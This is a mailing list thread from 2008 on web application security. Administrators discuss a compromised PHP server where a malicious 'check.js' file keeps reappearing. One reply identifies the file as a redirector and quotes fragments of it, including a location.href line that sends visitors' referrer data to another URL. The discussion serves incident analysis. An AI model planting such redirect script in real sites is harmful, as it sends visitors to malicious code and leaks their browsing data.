WebApp Sec mailing list archives
Re: PHP Security
From: "Greg Song" <bigrootno1 () gmail com>
Date: Wed, 19 Mar 2008 08:50:28 +0900
Hi, There are some files include 'check.js' same as you. First of all, 'check.js' is kinds of redirector. For example, If someone visited website that includes 'check.js', request redirect to some other URLs.(usually getting malicious code) and I guess it gather information(visit from where). parts of check.js ... google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|ramble... location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2 ... Greg. 2008/3/18, Sindre Øvrebø <sindre () webhuset no>:
----- Original message ----- From: "Greg Song" <bigrootno1 () gmail com> To: webappsec () securityfocus com Date: Tue, 18 Mar 2008 08:58:49 +0900 Subject: PHP SecurityHi all Thesedays I'm analyzing the solarys system that using apache web server and php. Of cause it hacked. I could not find reason of some situation that the specified directory are created over and over(it includes check.js) Weblog record as belowxxx.xxx.xxx.xxx GET "/XXX/ahibix/check.jsSome pages can upload the file but it didn't work when I uploaded some php file. I'm wondering how it makes some directories. Any suggestin,ideas. Thanks allHi, I am replying outside the list. I just discovered check.js, and some other files, on one of mye servers yesterday. What does check.js do? I am not familiar with this/these scripts. Would be really cool if you replied :) Sindre Øvrebø
------------------------------------------------------------------------- Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F -------------------------------------------------------------------------
Current thread:
- PHP Security Greg Song (Mar 18)
- Re: PHP Security Eduardo Tongson (Mar 18)
- Re: PHP Security Eric Marden (Mar 18)
- Re: PHP Security Greg Song (Mar 18)
- <Possible follow-ups>
- Re: PHP Security Greg Song (Mar 18)